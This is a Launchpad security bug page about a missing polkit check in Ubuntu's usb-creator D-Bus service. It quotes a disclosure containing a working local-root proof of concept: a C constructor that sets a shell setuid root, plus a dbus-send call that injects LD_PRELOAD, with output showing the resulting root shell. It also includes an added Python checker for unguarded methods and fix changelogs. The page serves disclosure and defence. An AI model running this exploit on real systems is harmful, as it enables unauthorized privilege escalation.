Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service

Bug #1447396 reported by Seth Arnold
This bug affects 4 people
Affects | Status | Importance | Assigned to | Milestone
usb-creator (Ubuntu) | Fix Released | Undecided | Marc Deslauriers |
Precise | Fix Released | Undecided | Marc Deslauriers |
Trusty | Fix Released | Undecided | Marc Deslauriers |
Utopic | Fix Released | Undecided | Marc Deslauriers |
Vivid | Fix Released | Undecided | Marc Deslauriers |

Bug Description

Reported on oss-security: http://www.openwall.com/lists/oss-security/2015/04/22/12

Text from Tavis follows:

Hello,

[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]

On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.

It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.

This seems like an obvious mistake, and the following appears to work
on my machine:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Thanks, Tavis.
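
A static check for the class of mistake described in the report, added here as an example and not part of the original report or of usb-creator's code: it parses a dbus-python service with `ast` and lists exported methods that never call `check_polkit`. The sample service, its interface name and the helpers `do_format` and `run_kvm` are constructed for illustration.

```python
import ast

# Constructed sample modelled on the pattern in the report. Only check_polkit
# and KVMTest come from the page; every other name here is hypothetical.
SAMPLE_SERVICE = '''
import dbus.service

class Helper(dbus.service.Object):
    @dbus.service.method("com.example.Helper", sender_keyword="sender",
                         connection_keyword="conn")
    def Format(self, device, sender=None, conn=None):
        check_polkit(sender, conn, "com.example.helper.format")
        do_format(device)

    @dbus.service.method("com.example.Helper", sender_keyword="sender",
                         connection_keyword="conn")
    def KVMTest(self, device, env, sender=None, conn=None):
        run_kvm(device, env)

    def _internal(self):
        pass
'''

def is_dbus_exported(func):
    """True if decorated with an attribute named .method, e.g. dbus.service.method(...)."""
    for dec in func.decorator_list:
        target = dec.func if isinstance(dec, ast.Call) else dec
        if isinstance(target, ast.Attribute) and target.attr == "method":
            return True
    return False

def calls(func, name):
    """True if the body contains a call to name(...) or obj.name(...)."""
    for node in ast.walk(func):
        if isinstance(node, ast.Call):
            callee = node.func
            if getattr(callee, "attr", None) == name or getattr(callee, "id", None) == name:
                return True
    return False

def unguarded_methods(source, guard="check_polkit"):
    """Names of D-Bus-exported methods that never call the guard."""
    return sorted(f.name for f in ast.walk(ast.parse(source))
                  if isinstance(f, ast.FunctionDef)
                  and is_dbus_exported(f) and not calls(f, guard))

if __name__ == "__main__":
    print(unguarded_methods(SAMPLE_SERVICE))
```

A call anywhere in the body counts as guarded, so a flagged method is a definite gap, while an unflagged one still needs review that the check runs before any privileged action.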

Changed in usb-creator (Ubuntu Precise):
status: New → Confirmed
Changed in usb-creator (Ubuntu Trusty):
status: New → Confirmed
Changed in usb-creator (Ubuntu Utopic):
status: New → Confirmed
Changed in usb-creator (Ubuntu Vivid):
status: New → Confirmed
Changed in usb-creator (Ubuntu Precise):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Trusty):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Utopic):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in usb-creator (Ubuntu Vivid):
assignee: nobody → Marc Deslauriers (mdeslaur)
Steve (st3v3)
information type: Public Security → Private Security
information type: Private Security → Public Security
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.38.3ubuntu0.1

---------------
usb-creator (0.2.38.3ubuntu0.1) precise-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:18:51 -0400

Changed in usb-creator (Ubuntu Precise):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.56.3ubuntu0.1

---------------
usb-creator (0.2.56.3ubuntu0.1) trusty-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:18:17 -0400

Changed in usb-creator (Ubuntu Trusty):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.62ubuntu0.3

---------------
usb-creator (0.2.62ubuntu0.3) utopic-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:16:13 -0400

Changed in usb-creator (Ubuntu Utopic):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package usb-creator - 0.2.67ubuntu0.1

---------------
usb-creator (0.2.67ubuntu0.1) vivid-security; urgency=medium

  * SECURITY UPDATE: privilege escalation via missing polkit check
    (LP: #1447396)
    - bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
      proper polkit integration for KVM use.
    - CVE number pending
 -- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:10:43 -0400

Changed in usb-creator (Ubuntu Vivid):
status: Confirmed → Fix Released
Seth Arnold (seth-arnold) wrote :

This has been assigned CVE-2015-3643 -- http://www.openwall.com/lists/oss-security/2015/05/04/3
